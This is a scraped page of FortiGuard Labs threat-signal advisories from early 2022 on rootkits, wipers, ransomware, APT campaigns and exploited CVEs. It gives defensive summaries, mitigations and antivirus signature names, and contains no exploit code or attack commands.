What's new around the internet

Last one

Src Date (GMT) Title Description Tags Stories Notes
Fortinet.webp 2022-03-18 13:39:21 New Rootkit Used by UNC2891 for ATM Money Heist (direct link)

FortiGuard Labs is aware of a report that a threat actor known as UNC2891 used a previously unknown rootkit to capture banking card and PIN verification data from compromised ATM switch servers. The captured data was used to perform fraudulent transactions. Dubbed Caketap, the rootkit allows the threat actor to hide network connections, processes, and files, and to install several hooks into system functions to receive commands and configurations from the attacker's remote server.

Why is this Significant?
This is significant because the previously unknown Caketap rootkit, deployed by the threat actor on Oracle Solaris systems, provides stealth for the attacker's activities, and the data it steals can be used for unauthorized financial transactions. The attacks carried out by UNC2891 are financially motivated and could cause great financial damage to the targeted financial institutions.

What is Caketap?
Caketap is a kernel module rootkit used by UNC2891 on Oracle Solaris systems. The rootkit is used to hide network connections, processes, and files, and to install several hooks into system functions to receive commands and configurations from the attacker's remote server.
The rootkit is capable of intercepting certain messages sent to the Payment Hardware Security Module (HSM) in order to disable proper banking card verification and return a valid response that approves fraudulent banking cards. It also examines PIN verification messages. If a PIN verification message is not for a fraudulent banking card, Caketap does not disrupt the valid verification but saves the message. If Caketap detects a PIN verification message for a fraudulent banking card, it replays the previously saved valid messages to bypass PIN verification.
Thales, an HSM vendor, describes the Payment Hardware Security Module (HSM) as "a hardened, tamper-resistant hardware device that is used primarily by the retail banking industry to provide high levels of protection for cryptographic keys and customer PINs used during the issuance of magnetic stripe and EMV chip cards (and their mobile application equivalents) and the subsequent processing of credit and debit card payment transactions".

What is UNC2891?
UNC2891 is a threat actor whose main motivation is reportedly financial gain and which has been active for several years. The threat actor is known to have extensive knowledge not only of Oracle Solaris systems, but also of Linux and Unix systems.

What Other Tools does UNC2891 Use?
The following tools are reported to have been used by the threat actor:
- SLAPSTICK - Pluggable Authentication Module (PAM) based backdoor
- Custom version of TINYSHELL - backdoor
- STEELHOUND - in-memory dropper
- STEELCORGI - in-memory dropper
- SUN4ME - toolkit that contains tools to spy on the network, enumerate hosts, exploit known vulnerabilities and wipe logs
- WINGHOOK - keylogger for Linux and Unix systems
- WINGCRACK - utility used to decode and display the information collected by WINGHOOK
- BINBASH - ELF utility that executes a shell after the group ID and user ID are set to either "root" or specified values
- WIPERIGHT - ELF utility for Linux and Unix systems used to clear specific logs
- MIGLOGCLEANER - ELF utility for Linux and Unix systems used to wipe logs or remove certain strings from logs

What is the Status of Coverage?
FortiGuard Labs provides the following AV coverage:
Linux/Agent.T!tr

Tags: Threat
Fortinet.webp 2022-03-16 15:04:14 Joint CyberSecurity Advisory Alert on Russian State-Sponsored Cyber Actors Gain Network Access by Exploiting Default Multifactor Authentication Protocols and "PrintNightmare" Vulnerability (AA22-074A) (direct link)

FortiGuard Labs is aware of a recent report issued by the U.S. Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) that Russian state-sponsored cyber actors gained network access to a non-governmental organization (NGO) through exploitation of default Multi-Factor Authentication (MFA) protocols and the "PrintNightmare" vulnerability (CVE-2021-34527). The attack resulted in data exfiltration from cloud and email accounts of the target organization.

Why is this Significant?
This is significant because the advisory describes how a target organization was compromised by Russian state-sponsored cyber actors. The advisory also provides mitigations.

How did the Attack Occur?
The advisory provides the following attack sequence:

"Russian state-sponsored cyber actors gained initial access to the victim organization via compromised credentials and enrolling a new device in the organization's Duo MFA. The actors gained the credentials via brute-force password guessing attack, allowing them access to a victim account with a simple, predictable password. The victim account had been un-enrolled from Duo due to a long period of inactivity but was not disabled in the Active Directory. As Duo's default configuration settings allow for the re-enrollment of a new device for dormant accounts, the actors were able to enroll a new device for this account, complete the authentication requirements, and obtain access to the victim network.

Using the compromised account, Russian state-sponsored cyber actors performed privilege escalation via exploitation of the "PrintNightmare" vulnerability (CVE-2021-34527) to obtain administrator privileges. The actors also modified a domain controller file, c:\windows\system32\drivers\etc\hosts, redirecting Duo MFA calls to localhost instead of the Duo server. This change prevented the MFA service from contacting its server to validate MFA login - this effectively disabled MFA for active domain accounts because the default policy of Duo for Windows is to "Fail open" if the MFA server is unreachable. Note: "fail open" can happen to any MFA implementation and is not exclusive to Duo.

After effectively disabling MFA, Russian state-sponsored cyber actors were able to successfully authenticate to the victim's virtual private network (VPN) as non-administrator users and make Remote Desktop Protocol (RDP) connections to Windows domain controllers. The actors ran commands to obtain credentials for additional domain accounts; then using the method described in the previous paragraph, changed the MFA configuration file and bypassed MFA for these newly compromised accounts. The actors leveraged mostly internal Windows utilities already present within the victim network to perform this activity. Using these compromised accounts without MFA enforced, Russian state-sponsored cyber actors were able to move laterally to the victim's cloud storage and email accounts and access desired content."

What is the "PrintNightmare" vulnerability (CVE-2021-34527)?
The "PrintNightmare" vulnerability was a critical vulnerability affecting the Microsoft Windows Print Spooler. Microsoft released an out-of-band advisory for the vulnerability on July 6th, 2021.

Has Microsoft Released a Patch for the "PrintNightmare" vulnerability (CVE-2021-34527)?
Yes, Microsoft released an out-of-band patch for the "PrintNightmare" vulnerability in July 2021. Due to its severity, Microsoft made the patches available for unsupported OS such as Windows 7 and Windows Server 2012. Successful exploitation of the vulnerability allows an attacker to run arbitrary code with SYSTEM privileges. FortiGuard Labs released an Outbreak Alert and Threat Signal for PrintNightmare. See the Appendix for a link to "Fortinet Outbreak Alert: Microsoft PrintNightmare" and "#PrintNightmare Zero Day Remote Code Execution Vulnerability".

What is the Status of Coverage?
FortiGuard Labs has IPS coverage in place for the "PrintNightmare" vulnerability (CVE-2021-34527):
MS.Windows.Print.Spooler.AddPrinterDriver.Privilege.Escalation
All known network IOC

Tags: Vulnerability Threat Patching
Fortinet.webp 2022-03-15 13:20:59 (Déjà vu) Additional Wiper Malware Deployed in Ukraine #CaddyWiper (direct link)

FortiGuard Labs is aware of new wiper malware observed in the wild attacking Ukrainian interests. The wiper was found today by security researchers at ESET and is dubbed CaddyWiper. Preliminary analysis reveals that the wiper malware erases user data and partition information from attached drives. According to the tweet, CaddyWiper does not share any code with HermeticWiper, IsaacWiper or any known malware family.
This is a breaking news event. More information will be added when relevant updates are available.
For further reference about Ukrainian wiper attacks, please see our Threat Signals from January and February. Also, please refer to our recent blog that covers the recent escalation in Ukraine, along with salient advice about patch management and why it is important, especially in today's political climate.

Is this the Work of Nobelium/APT29?
At this time, there is not enough information to correlate this to Nobelium/APT29 or nation state activity.

Was this Sample Signed?
No. Unlike the HermeticWiper sample related to the Ukrainian attacks, this sample is unsigned.

Why is Malware Signed?
Malware is often signed by threat actors in an attempt to evade AV or any other security software. Signed malware allows threat actors to evade and effectively bypass detection, guaranteeing a higher success rate.

What is the Status of Coverage?
FortiGuard Labs has AV coverage in place for publicly available samples as:
W32/CaddyWiper.NCX!tr

Tags: Malware Threat APT 29
Fortinet.webp 2022-03-10 23:39:03 APT41 Compromised Six U.S. State Government Networks (direct link)

FortiGuard Labs is aware of a report that threat actor APT41 compromised at least six networks belonging to U.S. state governments between May 2021 and February 2022. To gain a foothold in the victims' networks, the threat actor used a number of different attack vectors: exploiting vulnerable Internet-facing web applications and directory traversal vulnerabilities, performing SQL injection, and conducting de-serialization attacks. The intent of APT41 appears to be reconnaissance, though how the stolen information is to be used has not yet been determined.

Why is this Significant?
This is significant because at least six U.S. state government systems were broken into and data exfiltration was performed by APT41 as recently as February 2022. In addition, a zero-day vulnerability in the USAHerds application (CVE-2021-44207) as well as Log4j (CVE-2021-44228), among others, were exploited in the attacks.

What's the Detail of the Attack?
APT41 used several different methods to break into the targeted networks. In one case, the group exploited a SQL injection vulnerability in an Internet-facing web application. In another case, the group exploited a then previously unknown vulnerability (CVE-2021-44207) in USAHerds, a web application used by agriculture officials to manage animal disease control and prevention, livestock identification and movement. Also, APT41 reportedly started to exploit the infamous Log4j vulnerability (CVE-2021-44228) within hours of Proof-of-Concept (PoC) code becoming available. Patches for both vulnerabilities are available. Once successful in breaking into the victim's network, the threat actor performed reconnaissance and credential harvesting activities.

What is APT41?
APT41 is a threat actor who has been active since at least 2012. Also known as TA415, Double Dragon, Barium, GREF and WickedPanda, the group reportedly performs Chinese state-sponsored espionage activities. APT41 targets organizations in multiple countries across a wide range of industries, such as telecommunications, industrial and engineering, and think tanks. In 2020, five alleged members of the group were charged by the U.S. Justice Department for hacking more than 100 companies in the United States.

What are the Tools Used by APT41?
APT41 is known to use the following tools:
- ASPXSpy - web shell backdoor
- BITSAdmin - PowerShell cmdlets for creating and managing file transfers
- BLACKCOFFEE - backdoor that disguises its communications as benign traffic to legitimate websites
- certutil - command-line utility used for manipulating certification authority (CA) data and components
- China Chopper - web shell backdoor that allows an attacker to have remote access to an enterprise network
- Cobalt Strike - a commercial penetration testing tool, which allows users to perform a wide range of activities
- Derusbi - DLL backdoor
- Empire - PowerShell post-exploitation agent, which provides a wide range of attack activities to users
- gh0st RAT - Remote Access Trojan (RAT)
- MESSAGETAP - data mining malware
- Mimikatz - open-source credential dumper
- njRAT - Remote Access Trojan (RAT)
- PlugX - Remote Access Trojan (RAT)
- PowerSploit - open-source, offensive security framework which allows users to perform a wide range of activities
- ROCKBOOT - bootkit
- ShadowPad - backdoor
- Winnti for Linux - Remote Access Trojan (RAT) for Linux
- ZxShell - Remote Access Trojan (RAT)
- Badpotato - open-source tool that allows elevating user rights to System rights
- DustPan - shellcode loader, aka StealthVector
- DEADEYE - downloader
- LOWKEY - backdoor
- Keyplug - backdoor

What are Other Vulnerabilities Known to be Exploited by APT41?
APT41 exploited the following vulnerabilities, among others, in the past:
- CVE-2020-10189 (ManageEngine Desktop Central remote code execution vulnerability)
- CVE-2019-19781 (Vulnerability in Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP appliance)
- CVE-2019-3396 (Atlassian Confluence Widget Connector Macro Velocity Template Injection)
- CVE-2017-11882 (Microsoft Office Memory Corruption Vulnerability)
- CVE-2017-0199 (Microsoft Office/WordPad Remote Code Execut

Tags: Malware Tool Vulnerability Threat Guideline APT 41 APT 15 APT 15
Fortinet.webp 2022-03-09 18:47:38 FBI Releases Updated Indicators of Compromise for RagnarLocker Ransomware (direct link)

FortiGuard Labs is aware that the U.S. Federal Bureau of Investigation (FBI) released updated indicators of compromise (IOCs) for RagnarLocker (Ragnar_Locker) ransomware on March 8th, 2022. The report states "As of January 2022, the FBI has identified at least 52 entities across 10 critical infrastructure sectors affected by RagnarLocker ransomware, including entities in the critical manufacturing, energy, financial services, government, and information technology sectors."
The first sighting of the ransomware goes back to at least February 2020. RagnarLocker ransomware employs triple extortion tactics: it demands ransom after encrypting files, threatens to publicize stolen data, and uses DDoS (Distributed Denial of Service) attacks against the victim.

Why is this Significant?
This is significant because the FBI is aware that more than 50 organizations across 10 critical infrastructure sectors were affected by RagnarLocker ransomware. The fact that the FBI has made additional IOCs available to the public suggests that RagnarLocker will continue to be active and will likely produce more victims.

What is RagnarLocker Ransomware?
The first report of RagnarLocker (Ragnar_Locker) ransomware dates back to as early as February 2020. Just like any other ransomware, RagnarLocker encrypts files on the compromised machine and steals valuable data. It also deletes all Volume Shadow Copies, which prevents recovery of the encrypted files. Although there are some exceptions, files encrypted by RagnarLocker ransomware generally have a file extension that starts with .ragnar_ or ragn@r_ followed by random characters.
On top of the usual ransom demand to decrypt the files it encrypted, the ransomware threatens to publicize the data it stole from the victim if the ransom demand is not met. The RagnarLocker threat actors also add pressure on the victim to pay the ransom by performing DDoS (Distributed Denial of Service) attacks against the victim.
One notable thing about this ransomware is that it has code to check the location of the computer before the encryption process starts. If the computer is located in Russia, Azerbaijan, Armenia, Belarus, Georgia, Kazakhstan, Kyrgyzstan, Moldova, Tajikistan, Turkmenistan, Uzbekistan or Ukraine, the ransomware terminates itself.

What are the Mitigations for RagnarLocker Ransomware?
The following are the mitigations recommended by the FBI:
- Back up critical data offline.
- Ensure copies of critical data are in the cloud or on an external hard drive or storage device. This information should not be accessible from the compromised network.
- Secure your backups and ensure data is not accessible for modification or deletion from the system where the data resides.
- Use multi-factor authentication with strong passwords, including for remote access services.
- Keep computers, devices, and applications patched and up-to-date.
- Monitor cyber threat reporting regarding the publication of compromised VPN login credentials and change passwords and settings.
- Consider adding an email banner to emails received from outside your organization.
- Disable unused remote access/Remote Desktop Protocol (RDP) ports and monitor remote access/RDP logs.
- Audit user accounts with administrative privileges and configure access controls with least privilege in mind.
- Implement network segmentation.

What is the Status of Coverage?
FortiGuard Labs provides the following AV coverage against RagnarLocker ransomware:
Linux/Filecoder_RagnarLocker.A!tr
W32/RagnarLocker.43B7!tr.ransom
W32/Filecoder_RagnarLocker.A!tr
W32/RagnarLocker.A!tr.ransom
W32/RagnarLocker.C!tr
W32/RagnarLocker.B!tr.ransom
W32/RagnarLocker.4C9D!tr.ransom
W32/Filecoder_RagnarLocker.A!tr.ransom
W32/RagnarLocker.C!tr.ransom
W32/Filecoder_RagnarLocker.C!tr
W32/Filecoder.94BA!tr.ransom
W32/Filecoder.OAH!tr.ransom
All network IOCs are blocked by the WebFiltering client.

Tags: Ransomware Threat
Fortinet.webp 2022-03-01 09:16:53 Remote Utilities Software Distributed in Ukraine via Fake Evacuation Plan Email (direct link)

FortiGuard Labs is aware that a copy of Remote Manipulator System (RMS) was submitted from Ukraine to VirusTotal on February 28th, 2022. RMS is a legitimate remote administration tool that allows a user to remotely control another computer. The file name is in Ukrainian and translates to English as "Evacuation Plan (approved by the SSU on 28.02.2022 by Order No. 009363677833).exe". SSU likely stands for the Security Service of Ukraine.

Why is this Significant?
This is significant because, given its file name, the country from which the file was submitted to VirusTotal and the current situation in Ukraine, the file may have been distributed to Ukrainians.

What does the File Do?
The file silently installs a copy of the legitimate Remote Utilities software on the compromised machine. The software allows a remote user to control the compromised machine. Based on the telemetry FortiGuard Labs collected, there is one IP address in Ukraine that connected to the remote IP that likely belongs to the attacker.

How was the File Distributed to the Targets?
Most likely via links in email. CERT-UA published a warning today that "the representatives of the Center for Combating Disinformation began to receive requests for information from the mail of the Ukrainian Security Service. Such notifications are fake and are a cyberattack". The email below is reported to have been used in the attack.

Machine translation:
Email subject: Evacuation plan from: SBU (Urgent) -28.02.2022 day off: 534161
WARNING! This is an external sheet: do not click on the links or open a tab if you do not trust the editor. Report a suspicious list to ib@gng.com.ua.
Security Service of Ukraine
Good afternoon, you need to have acquainted with the electronic evacuation plan until 01.03.2022, to give data on the number of employees, fill in the document in accordance with Form 198\00-22SBU-98.
To ensure confidentiality of the transferred data, the password: 2267903645 is set on the deposit.
See the document on:
hxxps://mega.nz/file/[reducted]
Mirror 2: hxxps://files.dp.ua/en/[reducted]
Mirror 3: hxxps://dropmefiles.com/[reducted]

While the remote files were not available at the time of the investigation, the email and "Evacuation Plan (approved by the SSU on 28.02.2022 by Order No. 009363677833).exe" are likely connected based on the email content and the file name.

Can the File be Attributed to a Particular Threat Actor?
It's possible that a threat actor distributed the file to target Ukraine. However, while the Remote Utilities software is silently installed on the compromised machine, it displays an icon in the Windows taskbar. Since most threat actors aim to hide their activities, this is potentially the act of a novice attacker who is trying to take advantage of the current situation in Ukraine.

What is the Status of Coverage?
FortiGuard Labs provides the following AV coverage against the files involved in this attack:
Riskware/RemoteAdmin_RemoteUtilities

Tags: Tool Threat
Fortinet.webp 2022-03-01 09:15:01 Kernel Level RAT "Daxin" Discovered (direct link)

FortiGuard Labs is aware of a newly discovered backdoor dubbed Daxin. Discovered by Symantec, this backdoor allows an attacker to gather data, perform various command and control actions and exfiltrate data on victim machines. Because of our partnership with the Cyber Threat Alliance, we were provided with IOCs to create Fortinet protections in advance so that they would be ready for today's announcement.
What separates this backdoor from many others is that Daxin is a Windows kernel level driver, also referred to as a rootkit. Kernel level rootkits operate at ring 0, which allows them to run at the highest privileges of the operating system with impunity. What makes this threat dangerous and very effective is that it is able to leverage existing services and utilize them to perform whatever is needed without raising any suspicion from network administrators or endpoint security software. Daxin does not contain any capabilities unique from other backdoors; however, besides its ability to run at kernel level, Daxin can also intercept TCP/IP connections in real time for further evasion. Further communications noted were the use of a custom TCP/IP stack to communicate across multiple nodes on highly secured networks.
This backdoor has been attributed to state sponsored threat actors of China, whose targets are organizations that are of interest to the Chinese government.

What Operating Systems Were Targeted?
Windows operating systems.

What is the Likelihood of Exploitation?
Low. This is because the attacks observed were focused on the specific interests of the threat actors behind Daxin, and were not part of a widespread attack.

Is this Limited to Targeted Attacks?
Yes, all attacks observed were limited to state sponsored targets. This included governmental organizations of interest, as well as the telecommunications, transportation, and manufacturing sectors.

What is the Status of Coverage?
Customers running the latest AV definitions are protected by the following signatures:
W32/Agent.FF56!tr.bdr
W32/Backdoor.DAXIN!tr
W32/PossibleThreat
W64/Agent.FF56!tr.bdr
W64/Backdoor.DAXIN!tr
W64/Agent.QWHWSZ!tr
Malicious_Behavior.SB
W32/Exforel.B!tr.bdr
Dx.BG3D!tr
W64/Agent.WT!tr
W32/PossibleThreat

Tags: Threat
Fortinet.webp 2022-02-27 22:30:37 Previously Unseen Backdoor Bvp47 Potentially Victimized Global Targets (direct link)

FortiGuard Labs is aware of a report by Pangu Lab that a new Linux backdoor malware that reportedly belongs to the Equation group was used to potentially compromise more than 200 organizations across over 40 countries around the globe. The Equation group is regarded as one of the most highly skilled threat actors, which some speculate has close connections with the National Security Agency (NSA). The threat actor is also reported to have been tied to the Stuxnet malware that was used in a 2010 cyber attack on a nuclear centrifuge facility in Iran.

Why is this Significant?
Bvp47 is a previously undiscovered backdoor malware that was reportedly used in cyber attacks carried out by the Equation group. According to the report and information available in the documents that presumably leaked from the Equation group, over 200 organizations spread across more than 40 countries may have been infected with the Bvp47 malware. The Bvp47 file called out in the report was first submitted to VirusTotal in late 2013, which indicates that Bvp47 was used and undiscovered for close to a decade.

How was the Connection between the Bvp47 malware and the Equation Group Established?
Pangu Lab concluded that Bvp47 belongs to the Equation group because one of the folders included in the documents leaked by the Shadow Brokers in 2017 contained an RSA private key required by Bvp47 for its command execution and other operations.

Who are the Shadow Brokers?
The Shadow Brokers is a threat actor who claimed to have stolen highly classified information from the Equation group in 2016. The stolen information includes zero-day exploits, operation manuals and descriptions of tools used by the Equation group. The Shadow Brokers then attempted to sell the information to the highest bidder. After the auction attempt failed and no one purchased the information, the threat actor released it to the public. One of the most famous exploits included in the leaked documents is EternalBlue. Within a few weeks of the leak, EternalBlue was incorporated in Wannacry ransomware, which caused global panic in 2017.

What are the Characteristics of Bvp47?
Bvp47 is a Linux backdoor that performs actions upon receiving commands from Command and Control (C2) servers. Because the Bvp47 framework incorporates components such as "dewdrops" and "solutionchar_agents" that are included in the Shadow Brokers leaks, the backdoor is for mainstream Linux distributions, FreeBSD and Solaris, as well as JunOS. Bvp47 also runs various environment checks. If the requirements are not met, the malware deletes itself.

What is the Status of Coverage?
FortiGuard Labs provides the following AV coverage against Bvp47:
ELF/Agent.16DC!tr

Tags: Ransomware Malware Threat Wannacry Wannacry
Fortinet.webp 2022-02-27 20:17:01 ProxyToken (CVE-2021-33766): Authentication Bypass in Microsoft Exchange Server (direct link)

UPDATE 9/17 - An IPS signature has been released in definitions (18.160) as "MS.Exchange.Server.SecurityToken.Authentication.Bypass"

FortiGuard Labs is aware of a new disclosure dubbed PROXYTOKEN, which is an authentication bypass in Microsoft Exchange Server. The vulnerability was reported by security researcher Le Xuan Tuyen of the Zero Day Initiative (ZDI) in March 2021, and patched by Microsoft in the July 2021 release. Assigned CVE-2021-33766, this vulnerability allows an unauthenticated attacker to configure actions on mailboxes belonging to arbitrary users on the mail server. One example of this usage allows the threat actor to forward all emails addressed to an arbitrary user to an attacker-controlled account.

What are the Technical Details of this Vulnerability?
Microsoft Exchange Server creates two sites in IIS, one listening on port 80 (HTTP) and the other on port 443 (HTTPS). These are known as the Exchange Front End; the Exchange Back End runs on port 81 (HTTP) and port 444 (HTTPS) respectively. The front end is essentially a proxy to the back end. When forms require authentication, pages are served via /owa/auth/logon.aspx. Essentially, the issue arises when an Exchange-specific feature called "Delegated Authentication" is deployed: the front end is unable to perform authentication on its own, passes each request directly to the back end, and ultimately relies on the back end to determine whether the incoming request is properly authenticated.

Is there a Patch Available?
Yes. Microsoft has released patches for this in the July 2021 release.

What is the Status of Coverage?
Customers running the latest definitions are protected by the following IPS signature:
MS.Exchange.Server.SecurityToken.Authentication.Bypass

What Products are Affected?
Microsoft Exchange Server 2019, 2016 and 2013 are affected.

Any Other Suggested Mitigation?
Disconnect vulnerable Exchange servers from the internet until a patch can be applied. Due to the ease of disruption and potential for damage to daily operations, reputation, and unwanted release of personally identifiable information (PII), etc., it is important to keep all AV and IPS signatures up to date. It is also important to ensure that all known vendor vulnerabilities within an organization are addressed and patched, to protect against attackers establishing a foothold within a network.

Tags: Vulnerability Threat
Fortinet.webp 2022-02-23 18:34:00 New Wiper Malware Discovered Targeting Ukrainian Interests (direct link)

FortiGuard Labs is aware of new wiper malware observed in the wild attacking Ukrainian interests. The wiper was found today by security researchers at ESET. Various estimates from both outfits reveal that the wiper malware has been installed on several hundred machines within Ukraine. Cursory analysis reveals that the wiper malware carries a valid signed certificate that belongs to an entity called "Hermetica Digital" based in Cyprus.
This is a breaking news event. More information will be added when relevant updates are available. For further reference about Ukrainian wiper attacks, please see our Threat Signal from January. Also, please refer to our most recent blog that covers the recent escalation in Ukraine, along with salient advice about patch management and why it is important, especially in today's political climate.

Is this the Work of Nobelium/APT29?
At this time, there is not enough information to correlate this to Nobelium/APT29 or nation state activity.

Are there Other Samples Observed Using the Same Certificate?
No. Cursory analysis at this time highlights that the Hermetica Digital certificate used by this malware sample is the only one that we are aware of at this time.

Was the Certificate Stolen?
Unknown at this time. As this is a breaking news event, information is sparse.

Why is the Malware Signed?
Malware is often signed by threat actors in an attempt to evade AV or any other security software. Signed malware allows threat actors to evade and effectively bypass detection, guaranteeing a higher success rate.

What is the Status of Coverage?
FortiGuard Labs has AV coverage in place for publicly available samples as:
W32/KillDisk.NCV!tr

Tags: Malware Threat APT 29
Fortinet.webp 2022-02-16 16:54:16 Active Exploitation Against Adobe Commerce and Magento Through CVE-2022-24086 (direct link)

FortiGuard Labs is aware of reports that Magento Open Source and Adobe Commerce are actively being targeted and exploited through CVE-2022-24086. This vulnerability can lead to remote code execution (RCE) on an exploited server, which means an attacker will be able to execute arbitrary commands remotely. The vulnerability is rated as Critical by Adobe and has a CVSS score of 9.8 out of 10.

Why is this Significant?
Since Magento and Adobe Commerce are very popular E-commerce platforms across the globe, this can potentially impact a high number of online shoppers. Moreover, the attack complexity needed to carry out a successful attack has been deemed relatively low, and no extra privileges/permissions are required to execute this attack. A successful attack can result in the total loss of confidentiality, integrity and availability of the information and resources stored on the exploited server. In addition, the Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2022-24086 to the Known Exploited Vulnerabilities Catalog, which lists vulnerabilities that "are a frequent attack vector for malicious cyber actors of all types and pose significant risk to the federal enterprise."

What is CVE-2022-24086?
Adobe classifies CVE-2022-24086 as a vulnerability that stems from "improper input validation." Without properly sanitizing input from a user, the input can be modified so that it executes arbitrary commands on the exploited server.

What Versions of Adobe Commerce and Magento are Prone to CVE-2022-24086?
The vulnerability exists for Adobe Commerce 2.4.3-p1 and earlier versions, as well as 2.3.7-p2 and earlier versions. For Adobe Commerce 2.3.3 and below, this vulnerability does not exist. The vulnerability exists for both Adobe Commerce and Magento Open Source versions 2.3.3-p1 to 2.3.7-p2 and from 2.4.0 to 2.4.3-p1.

Is the Vulnerability Exploited in the Wild?
FortiGuard Labs has been made aware of exploits being used in the wild for this vulnerability.

Has the Vendor Released a Fix?
Yes. Adobe has released patches for all versions from 2.3.3-p1 to 2.3.7-p2 and from 2.4.0 to 2.4.3-p1.

What is the Status of Coverage?
Proof-of-Concept (POC) code is not available at the time of this writing and as such, no coverage is available. FortiGuard Labs is actively looking for additional information and will update this Threat Signal when protection becomes available.

Tags: Vulnerability Threat Guideline
Fortinet.webp 2022-02-07 10:51:16 ACTINIUM - Targeting Interests in the Ukraine (direct link)
FortiGuard Labs is aware of various campaigns targeting Ukraine by the threat actor known as ACTINIUM/Gamaredon/DEV-0157. ACTINIUM's modus operandi targets various verticals to conduct cyber espionage, including but not limited to governmental, NGO, law enforcement and nonprofit organizations. This latest campaign targeting Ukraine was observed by security analysts at Microsoft. Observed TTPs of ACTINIUM include spearphishing emails using specially crafted Microsoft Word documents that contain malicious macros. Other observed tactics use very small image files in the emails that report back to the hosting server so that the attacker can check whether the email was viewed. Of course, this depends on whether the recipient chooses to download images.
Previous analysis on Gamaredon (another name for ACTINIUM) conducted by FortiGuard Labs can be found here. FortiGuard Labs also documented attacks against Ukraine here.
What are the Technical Details of the Attack?
ACTINIUM uses multi-stage processes in which payloads download and execute further payloads. Observed staging techniques include highly obfuscated VBScripts, PowerShell scripts, self-extracting archives, LNK files, etc. To remain persistent, ACTINIUM relies on scheduled tasks. To evade detection and analysis, randomly generated dictionary words from a predefined word list are used to name subdomains, scheduled tasks and files, further confusing analysts.
Other observations include the use of DNS records that are frequently changed and contain unique domain names with multiple IP addresses attributed to them.
Three malware families were documented in the report:
PowerPunch - Downloaders and droppers using PowerShell
Pterodo - Malware that uses various hashing algorithms and on-demand schemes for decrypting data while freeing allocated heap space to evade detection and thwart analysis. The malware is evolving, using various strings to POST content with forged user agents, and various commands and scheduled tasks.
QuietSieve - Heavily obfuscated .NET binaries that act primarily as an infostealer.
Who/What is Behind this Attack?
According to Microsoft, this latest attack is attributed to the Russian FSB. This is consistent with previous reports by the Ukrainian government linking Gamaredon actors to the FSB.
Is this a Widespread Attack?
No. According to Microsoft, attacks are limited to targeted attacks in Ukraine.
What is the Status of Coverage?
Fortinet customers running the latest definitions are protected by the following AV signatures: MSIL/Pterodo.JJ!tr, MSIL/Pterodo_AGen.B!tr, MSIL/Pterodo.JK!tr, MSIL/Pterodo.JF!tr, MSIL/Pterodo.JI!tr, PossibleThreat, W32/PossibleThreat, VBS/SAgent!tr, W32/APosT.AUC!tr, W32/Pterodo.AWR!tr, W32/APosT!tr, W32/APosT.AWN!tr, VBA/Amphitryon.1918!tr, W32/Pterodo.AVL!tr, W32/Pterodo.AUZ!tr, W32/Pterodo.ASQ!tr, W32/GenKryptik.FGHO!tr, Riskware/Pterodo, W32/Pterodo.APR!tr, W32/Pterodo.AQB!tr
All network IOCs are blocked by the WebFiltering client.
Any Other Suggested Mitigation?
As ACTINIUM uses spearphishing techniques as an entry point, organizations are encouraged to conduct ongoing training sessions to educate and inform personnel about the latest phishing/spearphishing attacks. They also need to encourage employees to never open attachments from someone they don't know, and to always treat emails from unrecognized/untrusted senders with caution.
Since it has been reported that various phishing and spearphishing attacks have been delivered via social engineering distribution mechanisms, it is crucial that end users within an organization be made aware of the various types of attacks being delivered. This can be accomplished through regular training sessions and impromptu tests using predetermined templates by an organization's internal security department. Simple user awareness training on how to spot emails with malicious attachments or links could also help prevent initial access into the network.
Due to the ease of disruption and potential for damage to daily operations, reputation,
Malware Threat
Fortinet.webp 2022-02-03 16:21:02 Sugar Ransomware in the Wild (direct link)
FortiGuard Labs is aware that a new ransomware called "Sugar" is in the wild. Reportedly, Sugar ransomware targets consumers rather than enterprises. The first sample of Sugar ransomware appears to have been discovered in the wild in early November. Sugar ransomware encrypts files on the compromised machine and appends the ".encoded01" file extension to them. Victims are asked to pay a ransom to recover the encrypted files.
What is Sugar Ransomware?
Sugar is a ransomware written in Delphi that appeared in the wild in November 2021 at the latest. Once run, Sugar ransomware encrypts files on the compromised machine and appends the ".encoded01" file extension to them. The malware then displays a ransom note that asks the victim to visit the attacker's TOR page to pay the ransom in order to recover the encrypted files. The attacker offers to decrypt up to five files to prove that the encrypted files can be recovered once the ransom is paid.
The ransom note displayed by Sugar ransomware looks similar to that of REvil ransomware. Also, the TOR site used by Sugar ransomware closely resembles that of Cl0p ransomware. However, there is no evidence to suggest that the Sugar ransomware group is associated with the REvil and Cl0p threat actors.
How Widespread is Sugar Ransomware?
Based on the telemetry data collected by FortiGuard Labs, Sugar ransomware infections likely occurred in Canada, Thailand, the United States, Israel and Lithuania.
What is the Status of Coverage?
FortiGuard Labs provides the following AV coverage against Sugar ransomware: W32/Filecoder.OJD!tr.ransom, W32/PossibleThreat
Ransomware Malware Threat
Fortinet.webp 2022-01-28 10:28:18 BotenaGo Malware Targets Multiple IoT Devices (direct link)
FortiGuard Labs is aware of a report that the source code of the BotenaGo malware was recently made available on GitHub. BotenaGo is written in Golang and is reportedly capable of exploiting more than 30 vulnerabilities in various IoT devices such as routers, modems, and NAS devices, varying the delivered payload depending on the device it successfully exploited.
Why is this Significant?
This is significant because the source code of BotenaGo is available in a public repository, and with the report that BotenaGo is capable of exploiting more than 30 vulnerabilities, an uptick in its activity is expected.
What is BotenaGo Malware?
BotenaGo is an IoT (Internet of Things) malware written in Golang and may become a new arsenal used by Mirai attackers. The malware is reportedly capable of exploiting more than 30 vulnerabilities in various IoT devices (a list of those vulnerabilities is contained in the Alien Labs blog linked in the Appendix). After the targeted device is successfully exploited, the malware executes remote shell commands that download a payload that varies depending on the device it compromised. BotenaGo also sets up a backdoor on the compromised machine and awaits remote commands from the attacker on ports 19412 and 31412. It can also set up a listener on system I/O (terminal) user input and receive remote commands through it.
What Vulnerabilities are Exploited by BotenaGo?
Some of the known vulnerabilities exploited by BotenaGo are listed below:
CVE-2013-3307: Linksys X3000 1.0.03 build 001
CVE-2013-5223: D-Link DSL-2760U Gateway (Rev. E1)
CVE-2014-2321: ZTE modems
CVE-2015-2051: D-Link routers
CVE-2016-11021: D-Link routers
CVE-2016-1555: Netgear devices
CVE-2016-6277: Netgear devices
CVE-2017-18362: ConnectWise plugin
CVE-2017-18368: Zyxel routers and NAS devices
CVE-2017-6077: Netgear devices
CVE-2017-6334: Netgear devices
CVE-2018-10088: XiongMai uc-httpd 1.0.0
CVE-2018-10561: Dasan GPON home routers
CVE-2018-10562: Dasan GPON home routers
